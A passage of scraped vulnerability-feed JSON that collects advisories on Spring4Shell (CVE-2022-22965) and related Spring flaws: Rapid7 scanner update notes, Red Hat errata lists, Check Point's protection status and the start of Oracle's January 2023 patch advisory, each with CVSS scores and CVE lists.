on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2023-06-09T15:50:32", "description": "Red Hat support for Spring Boot provides an application platform that reduces the complexity of developing and operating applications (monoliths and microservices) for OpenShift as a containerized platform.\n\nThis release of Red Hat support for Spring Boot 2.7.2 serves as a replacement for Red Hat support for Spring Boot 2.5.12, and includes security, bug fixes and enhancements. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* reactor-netty: specific redirect configuration allows for a credentials leak (CVE-2020-5404)\n\n* kubernetes-client: Insecure deserialization in unmarshalYaml method (CVE-2021-4178)\n\n* protobuf-java: potential DoS in the parsing procedure for binary data (CVE-2021-22569)\n\n* undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629) (CVE-2022-1259)\n\n* undertow: Double AJP response for 400 from EAP 7 results in CPING failures (CVE-2022-1319)\n\n* spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-12-14T13:14:18", "type": "redhat", "title": "(RHSA-2022:8761) Moderate: Red Hat support for Spring Boot 2.7.2 update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5404", "CVE-2021-22569", "CVE-2021-3629", "CVE-2021-4178", "CVE-2022-1259", "CVE-2022-1319", "CVE-2022-22950"], "modified": "2022-12-14T13:14:40", "id": "RHSA-2022:8761", "href": "https://access.redhat.com/errata/RHSA-2022:8761", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-03T15:19:09", "description": "The ovirt-engine package provides the Red Hat Virtualization Manager, a centralized management platform that allows system administrators to view and manage virtual machines. The Manager provides a comprehensive range of features including search capabilities, resource management, live migrations, and virtual infrastructure provisioning.\n\nSecurity Fix(es):\n\n* nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n* apache-commons-compress: infinite loop when reading a specially crafted 7Z archive (CVE-2021-35515)\n\n* apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive (CVE-2021-35516)\n\n* apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive (CVE-2021-35517)\n\n* apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive (CVE-2021-36090)\n\n* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n* spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)\n\n* semantic-release: Masked secrets can be disclosed if they contain characters that are excluded from uri encoding (CVE-2022-31051)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nA list of bugs fixed in this update is available in the Technical Notes book:\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/html-single/technical_notes", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-14T12:11:20", "type": "redhat", "title": "(RHSA-2022:5555) Moderate: RHV Manager (ovirt-engine) [ovirt-4.5.1] security, bug fix and update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22096", "CVE-2021-33623", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090", "CVE-2021-3807", "CVE-2022-22950", "CVE-2022-31051"], "modified": "2022-08-02T08:33:42", "id": "RHSA-2022:5555", "href": "https://access.redhat.com/errata/RHSA-2022:5555", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-03T15:19:09", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis asynchronous security patch is an update to Red Hat Process Automation Manager 7.\n\nSecurity Fix(es):\n\n* com.google.code.gson-gson: Deserialization of Untrusted Data in com.google.code.gson-gson (CVE-2022-25647)\n\n* jsoup: Crafted input may cause the jsoup HTML and XML parser to get stuck (CVE-2021-37714)\n\n* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)\n\n* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)\n\n* protobuf-java: potential DoS in the parsing procedure for binary data (CVE-2021-22569)\n\n* spring-expression: Denial of service via specially crafted SpEL expression (CVE-2022-22950)\n\n* wildfly-elytron: possible timing attack in ScramServer (CVE-2021-3642)\n\n* wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users (CVE-2021-3717)\n\n* ant: excessive memory allocation when reading a specially crafted TAR archive (CVE-2021-36373)\n\n* mysql-connector-java: unauthorized access to critical (CVE-2021-2471)\n\n* netty: control chars in header names may lead to HTTP request smuggling (CVE-2021-43797)\n\n* wildfly-core: Invalid Sensitivity Classification of Vault Expression (CVE-2021-3644)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T04:17:59", "type": "redhat", "title": "(RHSA-2022:5903) Moderate: Red Hat Process Automation Manager 7.13.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.9, "vectorString": "AV:N/AC:M/Au:S/C:C/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22569", "CVE-2021-2471", "CVE-2021-36373", "CVE-2021-3642", "CVE-2021-3644", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-3717", "CVE-2021-37714", "CVE-2021-43797", "CVE-2022-22950", "CVE-2022-25647"], "modified": "2022-08-04T04:18:35", "id": "RHSA-2022:5903", "href": "https://access.redhat.com/errata/RHSA-2022:5903", "cvss": {"score": 7.9, "vector": "AV:N/AC:M/Au:S/C:C/I:N/A:C"}}, {"lastseen": "2023-06-03T15:19:09", "description": "This release of Red Hat Fuse 7.11.0 serves as a replacement for Red Hat Fuse 7.10 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References.\n\nSecurity Fix(es):\n\n* fastjson (CVE-2022-25845)\n\n* jackson-databind (CVE-2020-36518)\n\n* mysql-connector-java (CVE-2021-2471, CVE-2022-21363)\n\n* undertow (CVE-2022-1259, CVE-2021-3629, CVE-2022-1319)\n\n* wildfly-elytron (CVE-2021-3642)\n\n* nodejs-ansi-regex (CVE-2021-3807, CVE-2021-3807)\n\n* 3 qt (CVE-2021-3859)\n\n* kubernetes-client (CVE-2021-4178)\n\n* spring-security (CVE-2021-22119)\n\n* protobuf-java (CVE-2021-22569)\n\n* google-oauth-client (CVE-2021-22573)\n\n* XStream (CVE-2021-29505, CVE-2021-43859)\n\n* jdom (CVE-2021-33813, CVE-2021-33813)\n\n* apache-commons-compress (CVE-2021-35515, CVE-2021-35516, CVE-2021-35517, CVE-2021-36090)\n\n* Kafka (CVE-2021-38153)\n\n* xml-security (CVE-2021-40690)\n\n* logback (CVE-2021-42550)\n\n* netty (CVE-2021-43797)\n\n* xnio (CVE-2022-0084)\n\n* jdbc-postgresql (CVE-2022-21724)\n\n* spring-expression (CVE-2022-22950)\n\n* springframework (CVE-2021-22096, CVE-2021-22060, CVE-2021-22096, CVE-2022-22976, CVE-2022-22970, CVE-2022-22971, CVE-2022-22978)\n\n* h2 (CVE-2022-23221)\n\n* junrar (CVE-2022-23596)\n\n* artemis-commons (CVE-2022-23913)\n\n* elasticsearch (CVE-2020-7020)\n\n* tomcat (CVE-2021-24122, CVE-2021-25329, CVE-2020-9484, CVE-2021-25122, CVE-2021-33037, CVE-2021-30640, CVE-2021-41079, CVE-2021-42340, CVE-2022-23181)\n\n* junit4 (CVE-2020-15250)\n\n* wildfly-core (CVE-2020-25689, CVE-2021-3644)\n\n* kotlin (CVE-2020-29582)\n\n* karaf (CVE-2021-41766, CVE-2022-22932)\n\n* Spring Framework (CVE-2022-22968)\n\n* metadata-extractor (CVE-2022-24614)\n\n* poi-scratchpad (CVE-2022-26336)\n\n* postgresql-jdbc (CVE-2022-26520)\n\n* tika-core (CVE-2022-30126)\n\nFor more details about the security issues, including the impact, CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-07T14:16:35", "type": "redhat", "title": "(RHSA-2022:5532) Important: Red Hat Fuse 7.11.0 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15250", "CVE-2020-25689", "CVE-2020-29582", "CVE-2020-36518", "CVE-2020-7020", "CVE-2020-9484", "CVE-2021-22060", "CVE-2021-22096", "CVE-2021-22119", "CVE-2021-22569", "CVE-2021-22573", "CVE-2021-24122", "CVE-2021-2471", "CVE-2021-25122", "CVE-2021-25329", "CVE-2021-29505", "CVE-2021-30640", "CVE-2021-33037", "CVE-2021-33813", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090", "CVE-2021-3629", "CVE-2021-3642", "CVE-2021-3644", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-3859", "CVE-2021-40690", "CVE-2021-41079", "CVE-2021-41766", "CVE-2021-4178", "CVE-2021-42340", "CVE-2021-42550", "CVE-2021-43797", "CVE-2021-43859", "CVE-2022-0084", "CVE-2022-1259", "CVE-2022-1319", "CVE-2022-21363", "CVE-2022-21724", "CVE-2022-22932", "CVE-2022-22950", "CVE-2022-22968", "CVE-2022-22970", "CVE-2022-22971", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23596", "CVE-2022-23913", "CVE-2022-24614", "CVE-2022-25845", "CVE-2022-26336", "CVE-2022-26520", "CVE-2022-30126"], "modified": "2022-07-07T14:16:41", "id": "RHSA-2022:5532", "href": "https://access.redhat.com/errata/RHSA-2022:5532", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_security": [{"lastseen": "2023-04-20T02:09:19", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>), [CVE-2022-22946](<https://vulners.com/cve/CVE-2022-22946>), [CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>), and [CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://vulners.com/cve/CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T21:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T21:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2023-06-09T20:03:59", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 327 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ January 2023 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2917173.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-17T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - January 2023", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7536", "CVE-2018-1273", "CVE-2018-21010", "CVE-2018-25032", "CVE-2018-7489", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12973", "CVE-2019-17571", "CVE-2019-7317", "CVE-2020-0466", "CVE-2020-10543", "CVE-2020-10683", "CVE-2020-10693", "CVE-2020-10735", "CVE-2020-10878", "CVE-2020-11979", "CVE-2020-11987", "CVE-2020-12723", "CVE-2020-13920", "CVE-2020-13956", "CVE-2020-14392", "CVE-2020-14393", "CVE-2020-15250", "CVE-2020-15389", "CVE-2020-16156", "CVE-2020-27814", "CVE-2020-27841", "CVE-2020-27842", "CVE-2020-27843", "CVE-2020-27844", "CVE-2020-27845", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5408", "CVE-2021-0920", "CVE-2021-21290", "CVE-2021-21708", "CVE-2021-23358", "CVE-2021-2351", "CVE-2021-29338", "CVE-2021-29425", "CVE-2021-30641", "CVE-2021-31805", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-36090", "CVE-2021-3629", "CVE-2021-36483", "CVE-2021-36770", "CVE-2021-3737", "CVE-2021-37533", "CVE-2021-37750", "CVE-2021-3918", "CVE-2021-40528", "CVE-2021-4104", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-41411", "CVE-2021-4155", "CVE-2021-42717", "CVE-2021-43797", "CVE-2021-44228", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0084", "CVE-2022-0492", "CVE-2022-0934", "CVE-2022-1122", "CVE-2022-1259", "CVE-2022-1304", "CVE-2022-1319", "CVE-2022-1941", "CVE-2022-2047", "CVE-2022-2048", "CVE-2022-2053", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-21499", "CVE-2022-21597", "CVE-2022-21824", "CVE-2022-2191", "CVE-2022-22721", "CVE-2022-2274", "CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22970", "CVE-2022-22971", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23308", "CVE-2022-23437", "CVE-2022-23457", "CVE-2022-24329", "CVE-2022-24407", "CVE-2022-24823", "CVE-2022-24839", "CVE-2022-24891", "CVE-2022-24903", "CVE-2022-2509", "CVE-2022-25169", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-2526", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315", "CVE-2022-25647", "CVE-2022-25857", "CVE-2022-26336", "CVE-2022-26377", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-2764", "CVE-2022-27778", "CVE-2022-27779", "CVE-2022-27780", "CVE-2022-27781", "CVE-2022-27782", "CVE-2022-28614", "CVE-2022-28615", "CVE-2022-29404", "CVE-2022-29824", "CVE-2022-29885", "CVE-2022-30115", "CVE-2022-30126", "CVE-2022-3028", "CVE-2022-30293", "CVE-2022-30522", "CVE-2022-30556", "CVE-2022-31129", "CVE-2022-31625", "CVE-2022-31626", "CVE-2022-31627", "CVE-2022-31628", "CVE-2022-31629", "CVE-2022-31690", "CVE-2022-31692", "CVE-2022-3171", "CVE-2022-31813", "CVE-2022-32212", "CVE-2022-32213", "CVE-2022-32214", "CVE-2022-32215", "CVE-2022-32221", "CVE-2022-33980", "CVE-2022-34169", "CVE-2022-34305", "CVE-2022-34917", "CVE-2022-3509", "CVE-2022-3510", "CVE-2022-35260", "CVE-2022-35737", "CVE-2022-3602", "CVE-2022-36033", "CVE-2022-36055", "CVE-2022-37434", "CVE-2022-37454", "CVE-2022-3786", "CVE-2022-38398", "CVE-2022-38648", "CVE-2022-38749", "CVE-2022-38750", "CVE-2022-38751", "CVE-2022-38752", "CVE-2022-39271", "CVE-2022-39429", "CVE-2022-40146", "CVE-2022-40149", "CVE-2022-40150", "CVE-2022-40153", "CVE-2022-40303", "CVE-2022-40304", "CVE-2022-40664", "CVE-2022-4147", "CVE-2022-41717", "CVE-2022-41720", "CVE-2022-41853", "CVE-2022-41881", "CVE-2022-41915", "CVE-2022-4200", "CVE-2022-42003", "CVE-2022-42004", "CVE-2022-42252", "CVE-2022-42889", "CVE-2022-42915", "CVE-2022-42916", "CVE-2022-42920", "CVE-2022-43403", "CVE-2022-43404", "CVE-2022-43548", "CVE-2022-43680", "CVE-2022-45047", "CVE-2023-21824", "CVE-2023-21825", "CVE-2023-21826", "CVE-2023-21827", "CVE-2023-21828", "CVE-2023-21829", "CVE-2023-21830", "CVE-2023-21831", "CVE-2023-21832", "CVE-2023-21834", "CVE-2023-21835", "CVE-2023-21836", "CVE-2023-21837", "CVE-2023-21838", "CVE-2023-21839", "CVE-2023-21840", "CVE-2023-21841", "CVE-2023-21842", "CVE-2023-21843", "CVE-2023-21844", "CVE-2023-21845", "CVE-2023-21846", "CVE-2023-21847", "CVE-2023-21848", "CVE-2023-21849", "CVE-2023-21850", "CVE-2023-21851", "CVE-2023-21852", "CVE-2023-21853", "CVE-2023-21854", "CVE-2023-21855", "CVE-2023-21856", "CVE-2023-21857", "CVE-2023-21858", "CVE-2023-21859", "CVE-2023-21860", "CVE-2023-21861", "CVE-2023-21862", "CVE-2023-21863", "CVE-2023-21864", "CVE-2023-21865", "CVE-2023-21866", "CVE-2023-21867", "CVE-2023-21868", "CVE-2023-21869", "CVE-2023-21870", "CVE-2023-21871", "CVE-2023-21872", 